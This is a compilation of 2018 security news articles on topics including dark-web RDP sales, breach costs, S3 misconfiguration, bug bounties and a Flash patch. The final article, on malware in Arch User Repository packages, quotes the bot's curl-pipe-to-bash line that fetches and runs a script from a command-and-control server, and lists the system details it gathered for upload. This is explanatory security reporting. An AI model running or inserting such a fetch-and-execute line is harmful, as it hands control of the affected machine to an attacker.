STE WILLIAMS

Major International Airport System Access Sold for $10 on Dark Web

Researchers from the McAfee Advanced Threat Research team began with an open search on Russian RDP shop UAS to make their discovery.

Dark Web marketplaces are troves of illicit products and data: stolen credentials, credit card numbers, and, as researchers recently discovered, remote desktop protocol (RDP) access to the security and building automation systems of a major international airport – for the cheap price of $10.

Researchers from the McAfee Advanced Threat Research team used an open search on Ultimate Anonymity Service (UAS), a Russian RDP shop, to search for open RDP ports at that specific organization. They narrowed their search from 65,536 possible IPs to three; by obtaining a complete IP address, they could look up the WHOIS data and find all addresses belonging to a major airport, the name of which is being withheld.

RDP is a proprietary protocol developed by Microsoft to let someone access another machine via graphical interface. It’s intended for use by system admins but can be dangerous when attackers use it as an entry point. The recent SamSam ransomware campaign against American businesses is one recent example in which attackers spent $10 for access to a machine and demanded $40,000 in ransom. The actors behind SamSam continue to advance and spread the attack.

RDP shops serve as the foundation for major cyberattacks, reports McAfee, whose researchers scanned several RDP shops selling anywhere between 15 to more than 40,000 connections, the latter of which they discovered at UAS, the largest shop in their research.

RDP access provides a route to target systems without phishing, malware, or an exploit kit. Top use cases for RDP access include spam campaigns, cryptomining, ransomware, planting false flags to disguise illegal activity as coming from a victim’s machine, and pilfering system data for identity theft, credit card fraud, account takeover, extortion, and other malicious use cases.

“It’s a useful protocol,” says McAfee chief scientist Raj Samani, pointing to the benefits of RDP. “But unless it’s locked down, there are concerns whereby anybody with an IP address and login can get access to this particular environment.”

RDP shops sell entry to systems that are accessible via port 3389 – the RDP port – due to an issue like misconfiguration or missing two-factor authentication, Samani explains. Systems are advertised with their IP address, country, state, ZIP code, bandwidth, and date of addition. Price varies anywhere between $3 and $20 depending on bandwidth; the type of business is not a factor. Attackers simply have so much access they don’t have time to figure out where it all leads.

“They’re not going through and looking at the impacted organization,” Samani continues. “They’ve got so much of this [data] that it’s economies of scale.”

Further open-source searches revealed user accounts including an administrator account and two accounts associated with two companies specializing in airport security (building automation and video surveillance and analytics). Researchers also found a domain likely associated with the airport’s automated transit system.

“It’s troublesome that a system with such significant public impact might be openly accessible from the Internet,” writes John Fokker, head of cyber investigations for McAfee Advanced Threat Research, in a blog post on their findings.

Researchers also found RDP access being sold to multiple government systems, including those linked to the United States, and dozens of connections to healthcare institutions, such as nursing homes and medical equipment suppliers.

“This is not finding a piece of hay in a haystack,” Samani says. “This is a business, a huge business that is selling access to organizations and systems all across the world.”

To protect their organizations from this level of vulnerability, security managers are advised to take a few precautions: Use complex passwords and two-factor authentication to make brute-force RDP attacks harder to complete; don’t allow RDP connections over the open Internet; block IPs after too many failed login attempts; and regularly check for unusual entry attempts.

Related Content:

 

 

 

Black Hat USA returns to Las Vegas with hands-on technical Trainings, cutting-edge Briefings, Arsenal open-source tool demonstrations, top-tier security solutions and service providers in the Business Hall. Click for information on the conference and to register.

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance Technology, where she covered financial … View Full Bio

Article source: https://www.darkreading.com/threat-intelligence/major-international-airport-system-access-sold-for-$10-on-dark-web/d/d-id/1332270?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

New Cyber Center Opens at Augusta University in Georgia

University partners with state on $100 million Georgia Cyber Center for cybersecurity education and research.

The state of Georgia and Augusta University have opened a new $100 million cybersecurity education and research operation called the Georgia Cyber Center. The center, a partnership between the state and the university, is located at the university, and intended to improve both Georgia’s and the nation’s cybersecurity through research, workforce development, and entrepreneurship.

Its physical plant spans 332,000 square feet in two adjacent buildings, the first of which – the Hull McKnight Building – and the 340-seat auditorium opened July 10. In addition to the auditorium, the center features restricted access to meet classified and high-security needs, secure briefing space, a cyber range, an incubator/accelerator program, spaces for collaboration, and classrooms equipped for virtual and on-site training. The second building is scheduled to open in December 2018.

The Georgia Cyber Center comes as the Augusta area prepares for the relocation of the US Army Cyber Command, set to complete its move from the Washington DC area to Fort Gordon in the coming years. Students from academia, private industry, government, and the military will to take classes taught by faculty from Augusta University, the US Army Cyber School, Cyber Protection Brigade, and NSA Georgia. In addition, all upper-division courses for the school’s computer science, information technology, and cyber programs will be taught at the new facility.

For more, read here

 

 

 

Black Hat USA returns to Las Vegas with hands-on technical Trainings, cutting-edge Briefings, Arsenal open-source tool demonstrations, top-tier security solutions and service providers in the Business Hall. Click for information on the conference and to register.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/operations/new-cyber-center-opens-at-augusta-university-in-georgia/d/d-id/1332272?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

This Is How Much a ‘Mega Breach’ Really Costs

The average cost of a data breach is $3.86 million, but breaches affecting more than 1 million records are far more expensive.

Companies hit with a data breach pay an average of $3.86 million around the world, marking a 6.4% increase from last year. It’s no small amount for any company, but a few million is only a small fraction of the cost of “mega breaches,” which compromise at least 1 million records.

The “2018 Cost of a Data Breach Study,” sponsored by IBM Security and conducted by the Ponemon Institute, annually evaluates the total cost of security incidents. This marks the first time researchers calculated costs associated with breaches ranging from 1 million to 50 million lost records.

So what’s the damage? It turns out massive security breaches come with equally large price tags, ranging from $40 million for 1 million records lost to $350 million for 50 million records lost.

Researchers had been wanting to dig into the financial impact of mega breaches but previously lacked the data to do so, explains Caleb Barlow, vice president at IBM Security.

“You have to remember if we go back three or four years ago, when you got into these scenarios, unless they were credit-card-related, companies didn’t need to disclose,” he says. Now, as a result of breach disclosure laws, analysts have more data to work with.

As for the overall price increase of 6.4%, Barlow says the most concerning aspect isn’t the percentage itself, but the fact it continues to grow at all. The potential impact on consumers, and the companies supporting them, has become significant enough to gain board-level attention.

“With the average cost just under $4 million – and [we’re] not talking about mega breaches when we say $4 million – the fact this continues to grow is indicative that we as an industry haven’t got our arms around this yet,” he says.

According to the study, most data breaches (48%) come from malicious or criminal attacks, which are the most expensive, at $157 per capita. Twenty-seven percent are caused by human error – for example, negligent employees or contractors ($131 per capita). One-quarter result from system glitches, including both technical and business process failures ($128 per capita).

Hundreds of factors influence the cost of a data breach. Third-party involvement is the most significant: If a third party causes an incident, it costs the company about $13 per record stolen, the report reveals. “Every company nowadays is not a product only of what they do, but their supply chain as well,” Barlow points out. Extensive cloud migration and compliance failure both contribute to the growing cost, adding about $12 per record to the total expense. 

One of the factors researchers can better calculate is the reputational side of breach cost, including customer churn and brand damage. If a customer decides not to conduct business with a company due to a breach, or to wait to process a transaction, it can have a pretty devastating impact, he continues. Attackers are taking notice.

“Not only is that potential impact understood now in the cost of a data breach, but it’s something the adversary is very much aware of as well,” Barlow says. Companies with less than 1% loss of existing customers have an average breach cost of $2.7 million. Researchers estimate those with a churn rate over 4% face an average cost of $4.9 million.

Cost of data breach disclosure is another pricey factor, and it’s highest in the United States. Not only is the attack surface larger there compared with other nations, but there are also 49 unique breach disclosure laws to deal with. Companies will likely have to handle the process differently in each jurisdiction where they do business, increasing the cost of alerting users.

Fortunately, a few practices can lessen the financial burden of a data breach.

“There are definitely some things that can reduce the cost,” says Barlow, and not just breach prevention. This marks the second year in a row that incident response – having a team and plan in place for remediation – is the top cost-cutting measure ($14 per record).

Extensive use of encryption is another cost saver, cutting about $13 per record, followed by business continuity management (BCM) involvement and employee training ($9.30 each), participation in threat sharing ($8.70), artificial intelligence platforms ($8.20), and use of security analytics ($6.90).

Related Content:

 

 

 

Black Hat USA returns to Las Vegas with hands-on technical Trainings, cutting-edge Briefings, Arsenal open-source tool demonstrations, top-tier security solutions and service providers in the Business Hall. Click for information on the conference and to register.

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance Technology, where she covered financial … View Full Bio

Article source: https://www.darkreading.com/threat-intelligence/this-is-how-much-a-mega-breach-really-costs/d/d-id/1332274?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Getting Safe, Smart & Secure on S3

AWS Simple Storage Service has proven to be a security minefield. It doesn’t have to be if you pay attention to people, process, and technology.

Accenture. The United States Department of Defense. Walmart. Experian. FedEx. Verizon. Dow Jones. What do these organizations have in common? All of them have suffered a data breach as a result of a misconfigured open S3 container. Even cloud-native companies like Uber have suffered major data breaches from this common misconfiguration. This failure of process and technology has cost companies tens of millions of dollars and resulted in untold reputational harm, and they have only themselves to blame.

The default configuration for S3 — shorthand for Amazon Web Services’ Simple Storage Service — is closed to the public Internet. In that configuration, it’s reasonably secure. But there is a problem with relying on this configuration: it assumes that only people within an organization are using it. That is a bad assumption because it’s actually very easy to misconfigure S3 in such a way that it’s left world-readable (or even writable!).

For example, one “benefit” of the public cloud is that people can easily provision and configure resources for themselves. Random IT Guy in a large corporation needs some storage to deliver content? Spin up an S3 container and everything is good to go! The problem is that when Random IT Guy provisions storage, he doesn’t necessarily know how to secure it. Worse, there’s nothing to prevent him from doing it insecurely, or to alert anyone else to that fact that it’s insecure or even that it exists in the first place.

Shared Responsibility or Blanket Immunity?
Public cloud relies on the “shared responsibility” model, which delineates what vendors and users are responsible for regarding security. The notion of “shared responsibility” is extremely cute. According to this model, cloud vendors — including AWS — are responsible for the security of the cloud itself. Users are responsible for the security of what’s in it. This means that any public cloud provider, when faced with a breach of a customer’s data, is going to claim the customer was ultimately responsible for the security of the applications and data. Claiming responsibility for only the security of the cloud itself is close to declaring blanket immunity.

Still, there are some real, practical things you can do on three fronts that will make an actual difference in your security posture as it relates to S3 and the public cloud. They involve three things: people, processes, and technology:

People: The Magical Unicorn
Everyone knows we have a talent problem. There’s a shortage of cloud talent, a shortage of security talent, and cloud security talent is basically a magical unicorn. If anything has become clear, it’s that companies — even cloud-native ones — can’t hire the talent they need to make the cloud secure and perform better. The bottom line: stop trying to hire magical unicorns and start creating them. Just like the exceedingly rare “full stack developer” who knows both back end and front end, cloud security professionals are hard to find in the wild but possible to train. Create centers of excellence for cloud security and spend the hours and training dollars to make them leaders. Having expertise in-house will pay dividends in the long run.

Process: Effectively Deploying the Magical Unicorn
When the world’s largest shipping company, Maersk, was hit by a ransomware attack in June 2017, it pulled off an unprecedented feat of IT efficiency: Over the course of 10 days, Maersk’s IT team reinstalled over 4,000 servers, 45,000 PCs, and 2,500 applications. This Herculean recovery effort demonstrated that Maersk is clearly an incredibly effective technology organization … but not effective enough to not get breached.

The truth is that magical unicorns aren’t going to secure your enterprise if you don’t have the processes in place to understand your attack surface at scale. The Maersk breach occurred in its on-premises environment. In the cloud, understanding your attack surface is even harder because it’s so easy and cheap to spin up instances. So, when it comes to the cloud, including cloud storage like S3, organizations need to implement processes that control who can spin up instances, create the documentation required to do so, and then put in place audit procedures to make sure those rules are followed. Those audit procedures come back to people: This stuff needs to be someone’s job.

Technology: Putting the Horn on the Horse  
Sometimes the only difference between a horse and a magical unicorn is the technology backing them up. In cloud security, the right technology can put the horn on the horse, so to speak, accelerating the transformation from IT pro to cloud security expert. Cloud vendor security tools often fall short of achieving this outcome. Providers like AWS and Azure give you security monitoring tools, but those mostly produce a sea of data points for human experts to make sense of.

While cloud providers offer the bare minimum, many third-party vendors are working to address this challenge. Common feature sets among these vendors include the ability to continuously monitor and update as cloud instances get spun up and down (so you know what your attack surface actually is), as well as tracking the traffic patterns of S3 data to surface potentially problematic activity. Depending on the data set being used — whether it’s logs, agents, or network traffic — cloud security professionals can get different perspectives and insights, while the addition of machine learning to many of these offerings is improving the accuracy of alerts.

In summary, S3 has proven to be a security minefield, but it doesn’t have to be. Cloud security is an emerging field, presenting an opportunity for smart organizations to lead the way.

Related Content:

Learn from the industry’s most knowledgeable CISOs and IT security experts in a setting that is conducive to interaction and conversation. Register before July 27 and save $700! Click for more info

Eric Thomas serves as director of cloud for IT analytics company ExtraHop. Prior to taking this role, Eric led the ExtraHop professional services team, and draws on over 20 years of experience in IT operations.  Before joining ExtraHop, Eric performed a variety of … View Full Bio

Article source: https://www.darkreading.com/attacks-breaches/getting-safe-smart-and-secure-on-s3/a/d-id/1332257?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Banks Suffer an Average of 3.8 Data Leak Incidents Per Week

New study examines how financial services information gets sold and shared in the Dark Web.

It’s no secret that financial services organizations are juicy targets for cybercrime, but new data shows how much more the bad guys are stealing from them: in the past year, there’s been a 135% jump in bank data for sale on the Dark Web. 

A new report from IntSights Cyber Intelligence shows financial services is the number one most-attacked industry: from 2017 until the first half of 2018, the security firm found an average of 207 indictators of attacks – such as company IPs, domains, email, and data included in Dark Web chatter, malware, or target lists – on a US bank. In the first half of this year, that average hit 520.

“Based on our data of leaked banking information, we saw a 135% year-over year increase in financial data being sold on dark web black markets. For the first six months of 2018, we’ve seen an average of 98.9 incidents of data leakage per bank. That translates to 3.8 incidents per week per bank,” IntSights wrote in its report.

Read the full report here.  

 

 

 

Black Hat USA returns to Las Vegas with hands-on technical Trainings, cutting-edge Briefings, Arsenal open-source tool demonstrations, top-tier security solutions and service providers in the Business Hall. Click for information on the conference and to register.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/endpoint/privacy/banks-suffer-an-average-of-38-data-leak-incidents-per-week/d/d-id/1332275?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Critical Vulns Earn $2K Amid Rise of Bug Bounty Programs

As of June, a total of $31 million has been awarded to security researchers for this year – already a big jump from the $11.7 million awarded for the entire 2017.

Bug bounty programs are paying more money to more hackers, more of whom are discovering severe vulnerabilities: As of June, a total of $31 million has been awarded to security researchers for this year – already a big jump from the $11.7 million awarded for the entire 2017.

Over the past year, 116 bug reports were valued at over $10,000, with organizations offering up to $250,000 for severe flaws discovered. The numbers come from HackerOne’s “Hacker-Powered Security Report 2018,” in which analysts pulled data from 78,275 vulnerability reports submitted by ethical hackers to more than 1,000 organizations via HackerOne’s bug bounty platform.

“All of the volume numbers have increased tremendously,” says HackerOne CEO Marten Mickos. “But they have been trending like this for the past three years. The direction is clear.”

About 60% of organizations on HackerOne pay an average of $1,500 for critical vulnerabilities. In general, the average bounty for critical flaws is $2,041, a 6% increase year-over-year. The average award for a critical bug increased 33% to $20,000 for the highest awarding programs.

More than 72,000 vulnerabilities have been fixed as of May, and more than one-third (27,000) were addressed in the past year. Of the top 15 vulnerability types reported, cross-site scripting is the most common across all industries with the exception of healthcare and technology, where information disclosure flaws are most popular.

Government Programs Pick Up Speed
Private organizations are lagging behind the adoption curve when it comes to crowdsourced security, HackerOne reports. Nearly all (93%) of the Forbes Global 2000 list lacks a policy to receive, respond to, and remediate critical bug reports they receive from external parties.

Private programs make up 79% of all bug bounty programs on HackerOne, down from 88% in 2017 and 92% in 2016 – a sign more programs are going public. Most public bug bounty programs are in tech (63%), financial services and banking (9%), and media and entertainment (9%). Public programs made up 19% of program launches last year, about double the year prior.

In the government sector, specifically, there was an 125% increase in program launches around the world. The European Commission and Ministry of Defense Singapore both have launched bug bounty initiatives, and the US Department of Defense wrapped up bug bounty challenges for the US Army, US Air Force, and the Defense Travel System.

“Looking at industries, it’s interesting to see the government sector grow so strongly and pay so well,” Mickos says. “They pay more than the tech sector or telecom sector for critical vulnerabilities. It tells us something – it tells us the government is very serious about this. If you pay more for critical reports, you get more critical reports.”

Indeed, government programs pay an average of $3,892 for critical vulnerabilities, analysts found. The tech sector pays slightly less, at $3,635 per bug, followed by telecom ($2,976), professional services ($2,719), transportation ($1,892), and retail and ecommerce ($1,720).

A few factors are holding back private companies, Mickos says. The biggest reason, he says, is a mental block: Many companies simply don’t see the value. Some do, but they don’t have the capacity to fix flaws once they learn about them.

“If you lack the ability to fix them, you’re caught between a rock and a hard place,” Mickos says. “The ability to fix, and roll out fixes, is essential.”

Hacking Hackers’ Education
Security researchers have to think outside the box to gain the skills they need. Despite the growth of hacker education, less than 5% of hackers learn their skills in a classroom, HackerOne reports. Most (nearly 58%) are self-taught. Half studied computer science at an undergraduate or graduate level, and 26.4% studied computer science during or before high school.

One-quarter of hackers who submit to HackerOne are full-time students, over 90% are under the age of 35, and 44% are IT pros. Financial gain is a primary reason why ethical hackers hack, but it’s decreasing in importance. Most are motivated by the chance to learn techniques (15%), to be challenged (14%), and to have fun (14%), with money falling to fourth place (13%).

Related Content:

 

 

 

Black Hat USA returns to Las Vegas with hands-on technical Trainings, cutting-edge Briefings, Arsenal open-source tool demonstrations, top-tier security solutions and service providers in the Business Hall. Click for information on the conference and to register.

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance Technology, where she covered financial … View Full Bio

Article source: https://www.darkreading.com/threat-intelligence/critical-vulns-earn-$2k-amid-rise-of-bug-bounty-programs/d/d-id/1332277?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Facebook stares down barrel of $660,000 fine over data slurping

It’s the hot story right now in Europe…

…no, we’re not talking about the news that France just dumped neighbours Belgium out of the World Series with a 1-0 victory. [Surely you mean the World Cup?Ed.]

We’re talking about the widepspread media coverage that the UK Information Commissioner’s Office (ICO) intends to fine Facebook £500,000 (about $660,000) over the Cambridge Analytica fiasco:

[The ICO intends] to fine Facebook a maximum £500,000 for two breaches of the Data Protection Act 1998.

Facebook, with Cambridge Analytica, has been the focus of the investigation since February when evidence emerged that an app had been used to harvest the data of 50 million Facebook users across the world. This is now estimated at 87 million.

The ICO’s investigation concluded that Facebook contravened the law by failing to safeguard people’s information. It also found that the company failed to be transparent about how people’s data was harvested by others.

Cambridge Analytica (CA) – in cased you missed the saga as it uncoiled itself earlier this year – was a web analytics company started by a group of researchers with connections to Cambridge University in the UK.

Put web analytics together with the word Cambridge and you get the cool-sounding name Cambridge Analytica.

What seems to have started as some sort of academic research project soon morphed into a commercial enterprise that allowed participants to take psychometric tests via a Facebook app.

(Facebook apps are essentially plugins for the Facebook platform rather than applications in the traditional sense.)

The sneaky? bait-and-switchy? sleight-of-hand? devious? obvious-with-hindsight? why was anyone surprised? [delete as inappropriate] trick employed in the CA app was that the app explicitly asked you to give it access to account data that wasn’t available by default.

Notably, Cambridge Analytica acquired access to your profile, including a list of all your friends.

That means not only that the app learned a lot about you, but could associate your own “psychometric profile” with your friends – even if they disapproved of psychometric tests; even if they’d never have agreed themselves; indeed, even if they’d never heard of Cambridge Analytica.

As we explained back in March 2018:

You might well question how 270,000 people signing up for a Facebook personality quiz blossomed into a potential data breach affecting 50 million users [now 87 million users] – nearly 25% of potential US voters.

[…] The app scraped not just test-takers’ private profile data, but also that of their friends. Facebook didn’t disallow such behavior from apps at the time, but such data harvesting was allowed only to improve user experience in the app, not to be sold or used for advertising.

Facebook ultimately kicked CA off its platform, but not before a global brouhaha had erupted over whether the social networking giant ought to have done more to make sure that app developers stuck to both the letter and the spirit of Facebook’s own rules.

The ICO certainly seems to think Facebook could have, and should have, done more to stop Cambridge Analytica getting away with its industrial-scale data harvesting – thus the fine.

What next?

Would the ICO have hit Facebook harder if it could?

The ICO’s own announcement makes a point of mentioning that, even though current GDPR rules could in theory have led to a very much bigger fine, “due to the timing of certain incidents in this investigation, civil monetary penalties have to be issued under the previous legislation, the Data Protection Act 1998.”

The maximum financial penalty in civil cases under pre-GDPR laws is £500,000 – and that’s the amount the ICO chose.

Will Facebook pay up?

The ICO’s “fine” is currently only a Notice of Intent, so Facebook still has the right of reply.

Will we all be more careful with apps and plugins in future?

Let’s hope so – remember our simple rule: IF IN DOUBT, DON’T GIVE IT OUT.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/CKwWlBK3E14/

Apple and Google questioned by Congress over user tracking

In May, two weeks before the “we’re not kidding about this protecting user data stuff” General Data Protection Regulation (GDPR) went into effect in the EU, Apple started getting its protecting-user-data ducks in a much straighter row.

It cracked down on developers whose apps share location data, kicking them off the App Store until they cut out any code, frameworks or Software Development Kits (SDKs) that were in violation of its location data policies.

But hang on a minute… members of the US House of Representatives Energy and Commerce Committee asked Apple on Monday: why was it even necessary to limit how much data third-party app developers can collect from Apple device users in the first place?

… given that CEO Tim Cook has repeatedly told the press that Apple believes that “detailed profiles of people that have incredibly deep personal information that is patched together from several sources [shouldn’t] exist”?

Similar question to Alphabet CEO Larry Page: in June 2017, Google announced that Gmail would stop reading our email.

Nonetheless, reports surfaced last week that found the company is still allowing third parties to merrily scan away, giving them access to our email text, signatures, and receipt data, in order to target-market advertising. In fact, a new class action suit was filed against the company on Thursday night over developers’ scanning of millions of users’ private messages.

The committee wants Apple and Alphabet to answer some questions about how they’ve represented all this third-party access to consumer data, about their collection and use of audio recording data, and about location data that comes from iPhone and Android devices.

Inquiring minds want to know, for one thing, whether our mobile phones are actually listening to our conversations, the committee said in a press release.

Recent reports have… suggested that smartphone devices can, and in some instances, do, collect ‘non-triggered’ audio data from users’ conversations near a smartphone in order to hear a ‘trigger’ phrase, such as ‘okay Google’ or ‘hey Siri.’ It has also been suggested that third party applications have access to and use this ‘non-triggered’ data without disclosure to users.

We reported about that recent study – titled Panoptispy – last week. It comes from researchers at Northeastern University in Boston, who found that yes, your smartphone can watch and listen to you if it wants to.

They found that a small number of the 17,000 apps they analyzed were recording video, images or sound covertly and sending it all back to the app’s maker or a third party. On the plus side: it seems to be done not out of ill intent, but rather from misunderstandings about privacy. On the not so positive side, it lays bare the chaotic ecosystem in which apps and API developers exist, how poorly regulated it is, and how much developers can get away with if they choose to.

Here’s the full letter the lawmakers sent to Apple. Here’s the one they sent to Google’s overlord, Alphabet.

In the letters, the committee members remind Google and Apple that consumers have certain expectations about device tracking – particularly when a phone lacks a SIM card and when location services, WiFi and Bluetooth are turned off, such as when a device is in Airplane mode.

According to Gizmodo, Apple hadn’t responded to press inquiries as of Monday. Google sent this statement:

Protecting our users’ privacy and securing their information is of the utmost importance. We look forward to answering the Committee’s questions.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/lI-8KuFeqmk/

Update Flash (and Adobe Acrobat) now!

Dear Adobe Flash, you will not wear me down.

I will never, ever, ever tire of writing these words:

Remove your Flash player and, if for some reason you can’t or won’t (because… I don’t know… maybe your laptop is encased in concrete or your grip on life is maintained by an iron lung that only runs in the Flash player) then you should update your Flash player to the latest version.

I won’t tire of writing these words because, despite the grinding relentlessness with which they’re necessary, they remain important.

Critical Flash updates may be as regular as clockwork and as boring as dirt, but so long as Flash lives and criminals are exploiting it we have to stay on top of them. Even if you’ve taken the sensible step of removing it from your own machines, you may have friends and family who have not.

Taking an active interest in Flash updates doesn’t just protect you from malicious websites that exploit Flash bugs either. Familiarity with the process of updating, how updates arrive and the version you’re supposed to be running also makes it easier to spot the fake Flash updates that are so popular with malware peddlers too.

This month’s critical update fixes a type confusion vulnerability that can lead to arbitrary code execution, and it’s rated by Adobe as priority 2, meaning that “There are currently no known exploits”.

That’s good news – it means that, unlike February and June this year where a vulnerability was fixed after criminals had already begun to exploit it, you get to fix the roof while the sun is still shining.

You still have to fix it though.

The bug exists in all versions of Flash up to 30.0.0.113 and you need version 30.0.0.134 for the fix.

The Flash players bundled with Google Chrome, Microsoft Edge, and Internet Explorer 11 for Windows 10 and 8.1, will get it automatically.

Adobe advises that everyone else should update “via the update mechanism within the product” or by getting a freshly minted copy of its player from the Adobe Flash Player Download Center.

I advise that if you can live without it, do.

After a quiet few months, July’s Patch Tuesday update from Adobe also saw Adobe Acrobat delivering an eye-catching “hold my beer” to its beleaguered stablemate with no fewer than 53 critical bugs fixed, and a bunch of others besides.

Adobe advises that its Acrobat and Acrobat Reader products should update themselves but you can find instructions on how to update them manually, or in managed environments, by following the instructions in the security bulletin.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/VYDeA6gfoIk/

Another Linux distro poisoned with malware

Another day, another Linux distro with malware troubles.

Last time it was Gentoo, a hard-core, source-based Linux distribution that is popular with techies who like to spend hours tweaking their entire operating sytem and rebuilding all their software from scratch to wring a few percentage points of performance out of it.

That sort of thing isn’t for everyone, but it’s harmless fun and it does give you loads of insight into how everything fits together.

That sets it apart from distros such as ElementaryOS and Mint, which rival and even exceed Windows and macOS for ease of installation and use, but don’t leave you with much of a sense of how it all actually works.

This time, the malware poisoning happened to Arch Linux, another distro we’d characterise as hard-core, though very much more widely used than Gentoo.

Three downloadable software packages in the AUR, short for Arch User Respository, were found to have been rebuilt so they contained what you might (perhaps slightly unkindly) refer to as zombie downloader robot overlord malware.

Bots or zombies are malware programs that call home to fetch instructions from the crooks on what to do next.

The hacked packages were: acroread 9.5.5-8, balz 1.20-3 and minergate 8.1-2; they’ve all apparently been restored to their pre-infection state.

What happened?

Simply put, the packages had one line added – on Linux, the core functionality of a bot can be trivially condensed into a single line:

   curl -s https://[redacted]/~x|bash -

This single line of code, part of an installation script written in the Bash language, fetches a text file from a command-and-control (CC) server and runs it as a script in its own right.

The command curl is a program that fetches a web page using HTTP or HTTPS. The pipe character (|) is Unix shorthand for “use the output of the command on the left directly as the input of the command on the right”. And bash - says to read and use the data that’s coming as input, denoted by the dash (-) directly as a script program. The pipe character therefore means you don’t need to run one command to fetch a file and then tell the next command to read the same file back in – the data is, literally and figuratively, piped between the two programs via memory. Finally, the ampersand () means to run the whole thing in the background so that it’s as good as invisible.

This means that the attacker can change the behaviour of the malware at any time by altering the commands stored in the file ~x on the CC server.

At present, the ~x command sets up a regular background task- the Linux equivalent of a Windows service – that repeatedly runs a second script called u.sh that’s downloaded from the web page ~u on the same CC server.

The u.sh file tries to extract some basic data about the infected system , and to upload it to a Pastebin account.

The system data that the u.sh malware is interested in comes from the following Arch commands:

 echo ${MACHINE_ID}    -- this computer's unique ID (randomly generated at install time)
 date '+%s'            -- the current date and time
 uname -a              -- details about the Linux version that's loaded
 id                    -- details about the user account running the script
 lscpu                 -- technical details about the system processor chip
 pacman -Qeq           -- the software you've installed (Qe means "query explicit")
 pacman -Qdq           -- any extra software needed to go with it (Qd means "query dependencies")
 systemctl list-units  -- all the system services

Fortunately, the part of the script that does the data exfiltration contains a programming error, so the upload never happens.

The Arch reaction

Arch is well-respected for the enormous quantity of community documentation it has published in recent years – users of many other distros often find themselves referring to Arch Linux documentation pages to learn what they need to know.

Where Arch has been – how can we say this? – a little less likable, is the extent to which the distro’s culture mirrors the aggressive “alpha techiness” of the King of Linux, Linus Torvalds himself – a man who is on record for numerous intolerant, insulting and frequently purposeless outbursts aimed at those he thinks are in the way.

So we weren’t entirely surprised to see this online response from one of the luminati of the Arch community, dismissing the malware with a petulant “meh”:

This would be a warning for what exactly? That orphaned packages can be adopted by anyone? That we have a big bold disclaimer on the front page of the AUR clearly stating that you should use any content at your own risk?

This thread is attracting way more attention than warranted. I’m surprised that this type of silly package takeover and malware introduction doesn’t happen more often.

To be fair to the Arch team, the hacked packages were found on AUR, which is the Arch User Repository, which isn’t vouched for or vetted by the Arch maintainers – in the same sort of way that none of the off-market Android forums are vouched for by Google.

Nevertheless, the AUR site is logoed up and branded as the Arch User Repository, not merely the User Repository, so a bit less attitude from the Arch team wouldn’t hurt.

What to do?

You might not like Arch’s attitude – and if you don’t, you’re probably using a different distro anyway – but the warning on the community-operated Arch User Repository does, in fact, say it all, even if we’d sneak a hyphen between “user” and “produced”:

DISCLAIMER: AUR packages are user produced content. Any use of the provided files is at your own risk.

If you don’t trust it, don’t install it.


Note. We don’t expect this thing to be a problem in real life, but Sophos products will nevertheless detect the abovementioned scripts as Linux/BckDr-RVR, and block the CC URLs used to “feed” the attack. (If you’d like to try Sophos Anti-Virus for Linux, by the way, it’s 100% free both at work and at home.)


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/aaF7oCf1Ax8/